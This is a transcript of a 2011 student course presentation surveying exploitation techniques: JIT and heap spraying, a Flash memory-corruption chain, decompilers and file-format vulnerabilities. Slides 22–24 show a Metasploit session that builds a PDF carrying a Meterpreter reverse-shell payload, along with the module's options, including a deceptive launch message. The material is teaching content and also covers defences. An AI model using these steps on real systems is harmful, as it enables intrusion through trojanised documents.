1 / 25

EECS 354: A Survey of Techniques to Facilitate Exploitation

Jonathan Friedman Max Goldman Brian Lange Josiah Matlack Aaron Steinfeld. EECS 354: A Survey of Techniques to Facilitate Exploitation. November 29, 2011. Overview. JIT Spraying Heap Spraying Application-specific Exploits Decompilers File Format Vulnerabilities Demo. JIT Spraying.

nibaw
Download Presentation

EECS 354: A Survey of Techniques to Facilitate Exploitation

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Jonathan Friedman Max Goldman Brian Lange Josiah Matlack Aaron Steinfeld EECS 354:A Survey of Techniques to Facilitate Exploitation November 29, 2011

  2. Overview • JIT Spraying • Heap Spraying • Application-specific Exploits • Decompilers • File Format Vulnerabilities • Demo

  3. JIT Spraying • Introduced by Dionysus Blazakis in 2010 • Designed to overcome ASLR and DEP • JIT is executable • “Spraying” covers the heap in exploit code • Used in ActionScript code • Predictable address space layout • Used by implementing the xor operation

  4. JIT Spraying (cont) • 03470069 B8 D9D0543C MOV EAX,3C54D0D9 • 0347006E 35 5890903C XOR EAX,3C909058 • 03470073 35 6AF4593C XOR EAX,3C59F46A • 03470078 35 01C8903C XOR EAX,3C90C801 • 0347007D 35 D930903C XOR EAX,3C9030D9 • 03470082 35 5B53533C XOR EAX,3C53535B • var y = ( • 0x3c54d0d9 ^ • 0x3c909058 ^ • 0x3c59f46a ^ • 0x3c90c801 ^ • 0x3c9030d9 ^ • 0x3c53535b • )

  5. JIT Spraying (cont) • var y = ( • 0x3c54d0d9 ^ • 0x3c909058 ^ • 0x3c59f46a ^ • 0x3c90c801 ^ • 0x3c9030d9 ^ • 0x3c53535b • ) • 0347006A D9D0 FNOP • 0347006C 54 PUSH ESP • 0347006D 3C 35 CMP AL, 35 • 0347006F 58 POP EAX • 03470070 90 NOP • 03470071 90 NOP • 03470072 3C 35 CMP AL, 35 • 03470074 6A F4 PUSH -0C • 03470076 59 POP ECX • 03470077 3C 35 CMP AL, 35 • 03470079 01C8 ADD EAX, ECX • 0347007B 90 NOP • 0347007C 3C 35 CMP AL, 35 • 0347007E D930 FSTENV DS:[EAX ]

  6. JIT Spraying (cont) • Defenses exist • Signature detection • Looks for NOPs • High false-positive rate • Heuristics • Look at xored values • Stateful • Look for short jumps

  7. Heap Spraying • Modified heap overflow technique used to overcome address space randomization • Allocates “blocks” throughout heap containing a nop sled followed by malicious code • Increases the chance of malicious code being executed

  8. Heap Spraying (cont)

  9. NOZZLE: Heap Spraying Defense • Developed by Microsoft Research in 2008 • Defends against heap spraying by: • Scanning each individual object on heap, looking for nop slides followed by shellcode • Looking for heaps with a high proportion of malicious objects

  10. Application-specific Exploits • Exploit a vulnerability specific to an application to corrupt memory • Can be quite complex and difficult to prevent or debug • In order to help prevent these exploits, code should be tested extensively • Error codes are your friend • Check them

  11. Application-specific Exploits (cont) • Example: Adobe Flash • Can set a parameter to a negative value • Guarantees a failed allocation whose return value is never checked • The program does pointer arithmetic between this (now NULL) pointer and a user input value • Allows user to write to memory • But, this isn’t directly useful because the value written is only marginally of the hacker’s choosing • So what do we do?

  12. Application-specific Exploits (cont) • Example (cont): ActionScript VM • Can also execute ActionScript from a Flash file • ActionScript VM verifies its input by using bitmasks from memory, but then executes them directly • Overwriting these bitmasks with the previous exploit allows us to execute unverified code • Now save the EIP, replace it with selected pointer, and execute a return to jump to that pointer (presumably at some shellcode loaded in the Flash file) • Then, restore the saved EIP and return like nothing happened

  13. Decompilers • Decode the binary-file format • Decode the machine instructions into assembly code for that machine • Perform semantic analysis to recover some low-level data types such as long variables, and to simplify the decoded instructions based on their semantics

  14. Decompilers (cont) • Store the information in a suitable intermediate representation If a suitable intermediate language is used, the next 2 steps can be used with any assembly language to generate any procedural HLL code. • Perform data flow analysis to remove low-level aspects of the intermediate representation that do not exist in HLLs, e.g. registers, condition codes, stack references.

  15. Decompilers (cont) • Perform control flow analysis to recover the control structures available in each procedure (i.e. loops, conditionals and their nesting level) • Perform type analysis to recover HLL data types such as arrays and structures. • Generate HLL code from the transformed intermediate code.

  16. Decompilers (cont)

  17. File Format Vulnerabilites In the news… • Duqu • Installer recently foundin the form of a .doc file • iOS Jailbreaks • Have taken advantage of PDF and TIFF handling vulnerabilities

  18. File Format Vulnerabilites (cont) At their most abstract level: Documents, images, videos Programs, OSs Things handle files. Specially craft the file, and you may be able to manipulate the thing. Crash, reverse engineer, execute arbitrary code

  19. Why so popular? • They’re more stealthy. • 2. They’re getting easier to do.

  20. Tools of the Trade • File Format fuzzers • 4f and Metasploit • Brute-force approach • Metasploit can also be used to automate attacks as usual for kids!

  21. Prevention • Don’t be stupid. • Client-side antivirus • Keeping software up to date

  22. PDF Exploit Using Metasploit • Metasploit can inject executable code into a .pdf file, which will launch on startup • Exploited on Windows XP SP3, with Adobe Reader 8.0 and below • Also works on Foxit Reader • After exploiting the .pdf, the .exe injection will run automatically

  23. Exploit code • msf exploit(adobe_pdf_embedded_exe) > set PAYLOAD windows/meterpreter/reverse_tcp • PAYLOAD => windows/meterpreter/reverse_tcp • msf exploit(adobe_pdf_embedded_exe) > set LHOST localhost • LHOST => localhost • smsf exploit(adobe_pdf_embedded_exe) > set INFILENAME test.pdf • INFILENAME => test.pdf • msf exploit(adobe_pdf_embedded_exe) > exploit • [*] Started reverse handler • [*] Reading in 'test.pdf'... • [*] Parseing 'test.pdf'... • [*] ParseingSuccessfull. • [*] Using 'windows/meterpreter/reverse_tcp' as payload... • [*] Creating 'evil.pdf' file... • [*] Generated output file /home/jwm903/.msf3/modules/exploits/data/exploits/evil.pdf • [*] Exploit completed, but no session was created.

  24. Additional Options • EXENAME The Name of payload exe. • FILENAME The output filename. (default: evil.pdf) • INFILENAME The Input PDF filename. • LAUNCH_MESSAGE The message to display in the File: area (default: To view the encrypted content please tick the "Do not show this message again" box and press Open.) • ContextInformationFile The information file that contains context information • DisablePayloadHandler Disable the handler code for the selected payload • EXE::Custom Use custom exe instead of automatically generating a payload exe • EXE::FallBack Use the default template in case the specified one is missing • EXE::Inject Set to preserve the original EXE function • EXE::OldMethod Set to use the substitution EXE generation method. • EXE::Path The directory in which to look for the executable template • EXE::Template The executable template file name. • EnableContextEncoding Use transient context when encoding payloads • VERBOSE Enable detailed status messages • WORKSPACE Specify the workspace for this module • WfsDelay Additional delay when waiting for a session

  25. DEMO

More Related